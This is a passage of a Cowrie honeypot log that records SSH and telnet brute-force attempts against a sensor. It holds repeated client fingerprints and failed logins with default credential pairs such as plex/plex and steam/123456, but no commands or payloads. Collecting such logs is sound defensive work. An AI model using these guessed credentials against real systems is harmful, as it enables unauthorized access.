a2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:41:44.719459Z","src_ip":"212.227.125.160","session":"819fee318e4e"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-28T06:41:45.588755Z","src_ip":"212.227.125.160","session":"819fee318e4e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:41:46.806341Z","src_ip":"212.227.125.160","session":"819fee318e4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48868,"dst_ip":"1.2.3.4","dst_port":23,"session":"7f302ebec3db","protocol":"telnet","message":"New connection: 212.227.125.160:48868 (1.2.3.4:23) [session: 7f302ebec3db]","sensor":"my-vps","timestamp":"2025-08-28T06:41:49.814624Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59230,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca7f379e3850","protocol":"ssh","message":"New connection: 212.227.235.229:59230 (1.2.3.4:22) [session: ca7f379e3850]","sensor":"my-vps","timestamp":"2025-08-28T06:41:51.097001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:41:51.097923Z","src_ip":"212.227.235.229","session":"ca7f379e3850"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:41:51.351112Z","src_ip":"212.227.235.229","session":"ca7f379e3850"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-28T06:41:52.367565Z","src_ip":"212.227.235.229","session":"ca7f379e3850"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:41:53.624237Z","src_ip":"212.227.235.229","session":"ca7f379e3850"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44634,"dst_ip":"1.2.3.4","dst_port":22,"session":"48aefb3a2cae","protocol":"ssh","message":"New connection: 212.227.125.160:44634 (1.2.3.4:22) [session: 48aefb3a2cae]","sensor":"my-vps","timestamp":"2025-08-28T06:42:01.250277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:42:01.256227Z","src_ip":"212.227.125.160","session":"48aefb3a2cae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:42:01.480523Z","src_ip":"212.227.125.160","session":"48aefb3a2cae"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-28T06:42:02.348153Z","src_ip":"212.227.125.160","session":"48aefb3a2cae"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:42:03.570128Z","src_ip":"212.227.125.160","session":"48aefb3a2cae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36430,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3d5e6310811","protocol":"ssh","message":"New connection: 212.227.235.229:36430 (1.2.3.4:22) [session: e3d5e6310811]","sensor":"my-vps","timestamp":"2025-08-28T06:42:07.720337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:42:07.721541Z","src_ip":"212.227.235.229","session":"e3d5e6310811"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:42:07.975931Z","src_ip":"212.227.235.229","session":"e3d5e6310811"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-28T06:42:08.741527Z","src_ip":"212.227.235.229","session":"e3d5e6310811"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:42:09.997880Z","src_ip":"212.227.235.229","session":"e3d5e6310811"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37262,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6140f90f52d","protocol":"ssh","message":"New connection: 212.227.125.160:37262 (1.2.3.4:22) [session: b6140f90f52d]","sensor":"my-vps","timestamp":"2025-08-28T06:42:17.481088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:42:17.482159Z","src_ip":"212.227.125.160","session":"b6140f90f52d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:42:17.720762Z","src_ip":"212.227.125.160","session":"b6140f90f52d"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:42:18.394743Z","src_ip":"212.227.125.160","session":"b6140f90f52d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:42:19.613622Z","src_ip":"212.227.125.160","session":"b6140f90f52d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64012,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ef3dbfab684","protocol":"ssh","message":"New connection: 217.72.205.35:64012 (1.2.3.4:22) [session: 4ef3dbfab684]","sensor":"my-vps","timestamp":"2025-08-28T06:42:23.624295Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:42:23.625364Z","src_ip":"217.72.205.35","session":"4ef3dbfab684"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38536,"dst_ip":"1.2.3.4","dst_port":22,"session":"e25877afca68","protocol":"ssh","message":"New connection: 212.227.235.229:38536 (1.2.3.4:22) [session: e25877afca68]","sensor":"my-vps","timestamp":"2025-08-28T06:42:24.267659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:42:24.269224Z","src_ip":"212.227.235.229","session":"e25877afca68"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:42:24.527951Z","src_ip":"212.227.235.229","session":"e25877afca68"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:42:25.306705Z","src_ip":"212.227.235.229","session":"e25877afca68"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:42:26.568405Z","src_ip":"212.227.235.229","session":"e25877afca68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55796,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9e8872a32d3","protocol":"ssh","message":"New connection: 212.227.125.160:55796 (1.2.3.4:22) [session: e9e8872a32d3]","sensor":"my-vps","timestamp":"2025-08-28T06:42:34.075540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:42:34.076454Z","src_ip":"212.227.125.160","session":"e9e8872a32d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:42:34.311473Z","src_ip":"212.227.125.160","session":"e9e8872a32d3"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-28T06:42:35.240735Z","src_ip":"212.227.125.160","session":"e9e8872a32d3"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:42:36.474941Z","src_ip":"212.227.125.160","session":"e9e8872a32d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55674,"dst_ip":"1.2.3.4","dst_port":22,"session":"197015337958","protocol":"ssh","message":"New connection: 212.227.235.229:55674 (1.2.3.4:22) [session: 197015337958]","sensor":"my-vps","timestamp":"2025-08-28T06:42:40.644693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:42:40.645466Z","src_ip":"212.227.235.229","session":"197015337958"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:42:40.891481Z","src_ip":"212.227.235.229","session":"197015337958"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-28T06:42:41.631613Z","src_ip":"212.227.235.229","session":"197015337958"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:42:42.880241Z","src_ip":"212.227.235.229","session":"197015337958"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44184,"dst_ip":"1.2.3.4","dst_port":22,"session":"b37d2f04821c","protocol":"ssh","message":"New connection: 212.227.125.160:44184 (1.2.3.4:22) [session: b37d2f04821c]","sensor":"my-vps","timestamp":"2025-08-28T06:42:50.577733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:42:50.578739Z","src_ip":"212.227.125.160","session":"b37d2f04821c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:42:50.801041Z","src_ip":"212.227.125.160","session":"b37d2f04821c"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-28T06:42:51.697174Z","src_ip":"212.227.125.160","session":"b37d2f04821c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:42:52.922320Z","src_ip":"212.227.125.160","session":"b37d2f04821c"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":54830,"dst_ip":"1.2.3.4","dst_port":23,"session":"0fe31620a4b8","protocol":"telnet","message":"New connection: 8.222.212.69:54830 (1.2.3.4:23) [session: 0fe31620a4b8]","sensor":"my-vps","timestamp":"2025-08-28T06:42:56.122825Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60152,"dst_ip":"1.2.3.4","dst_port":22,"session":"546c5276ea91","protocol":"ssh","message":"New connection: 212.227.235.229:60152 (1.2.3.4:22) [session: 546c5276ea91]","sensor":"my-vps","timestamp":"2025-08-28T06:42:57.020284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:42:57.021041Z","src_ip":"212.227.235.229","session":"546c5276ea91"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:42:57.270763Z","src_ip":"212.227.235.229","session":"546c5276ea91"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-28T06:42:58.029901Z","src_ip":"212.227.235.229","session":"546c5276ea91"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:42:59.282820Z","src_ip":"212.227.235.229","session":"546c5276ea91"}
{"eventid":"cowrie.session.connect","src_ip":"120.46.163.82","src_port":46784,"dst_ip":"1.2.3.4","dst_port":22,"session":"1618d046a340","protocol":"ssh","message":"New connection: 120.46.163.82:46784 (1.2.3.4:22) [session: 1618d046a340]","sensor":"my-vps","timestamp":"2025-08-28T06:43:00.573508Z"}
